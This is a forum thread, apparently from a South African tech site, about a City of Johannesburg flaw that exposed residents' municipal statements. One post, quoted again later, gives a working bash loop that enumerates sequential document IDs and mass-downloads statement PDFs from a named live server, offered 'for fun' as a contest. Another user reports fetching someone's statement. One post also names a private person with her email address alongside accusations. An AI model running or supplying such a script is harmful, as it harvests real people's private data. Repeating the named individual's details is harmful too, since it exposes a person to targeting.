City of Joburg security flaw exposes private info

BrokenLink

Senior Member
Joined
Aug 7, 2008
Messages
963
Did they also pay R143m and use those little kids that made the Free state governments word press website?
 

DJ...

Banned
Joined
Jan 24, 2007
Messages
70,288
How can one change details with the information? The login doesn't use the account number and pin as far as I can tell...
 

MagicDude4Eva

Banned
Joined
Apr 2, 2008
Messages
6,479
Worst part still to come: A ton of security companies will now fill out tender forms and tax payers will pay millions to fix a simple software development/architecture (a major rookie mistake - whoever the IT service provider is, should really look at their review & QA process). Makes one wonder how many more leaks like this exist and how much of this information is currently misused.

Quite scary how lenient CoJ is with collections (but then again, who knows if those invoices are correct to begin with).
 

phaktza

Executive Member
Joined
Jun 29, 2008
Messages
7,443
I warned everyone months ago that the passwords are stored as plaintext.

Furthermore, the CoJ changed my email address to a debt collection company to receive my statements! I spent months harassing the individual in question, yet they denied everything.

The individual in question is Chrissenda Jacobs <chrissenda@in-quest.co.za>; a quick search reveals http://www.in-quest.co.za/ to be "Commercial Debt Collection and Consumer Debt Collection" agency.

So even if this were the case, CoJ is happy to share your information with just about anyone!
 

Necropolis

Executive Member
Joined
Feb 26, 2007
Messages
8,401
I warned everyone months ago that the passwords are stored as plaintext.

Furthermore, the CoJ changed my email address to a debt collection company to receive my statements! I spent months harassing the individual in question, yet they denied everything.

The individual in question is Chrissenda Jacobs <chrissenda@in-quest.co.za>; a quick search reveals http://www.in-quest.co.za/ to be "Commercial Debt Collection and Consumer Debt Collection" agency.

So even if this were the case, CoJ is happy to share your information with just about anyone!
That In-Quest site has been hacked as well:

This Site has been hacked by 0NullSec!

No Damage has been done to the site!

Admin please Secure your site!
 

bullzeye.za

Expert Member
Joined
Sep 16, 2008
Messages
1,713
Just for fun, here's a little bash script if you want to download a bunch of those:
for i in `seq -w 0 999999`
do
wget -c --content-disposition "http://cojestatements.co.za:8080/cojpdfweb/getPDF?documentID=112001$i&download=true"
done


Let's see who can get the most :p

But seriously, don't use this. Do not.
 
Last edited:

siraman

Expert Member
Joined
Jan 13, 2009
Messages
1,982
Holy s**t!!! I've just downloaded someone's statement,nooooooo this is so wrong,heads must roll.
 

Bern

Expert Member
Joined
Apr 29, 2010
Messages
2,675
Just for fun, here's a little bash script if you want to download a bunch of those:
for i in `seq -w 0 999999`
do
wget -c --content-disposition "http://cojestatements.co.za:8080/cojpdfweb/getPDF?documentID=112001$i&download=true"
done


Let's see who can get the most :p

But seriously, don't use this. Do not.
I would never even consider it...
 
Top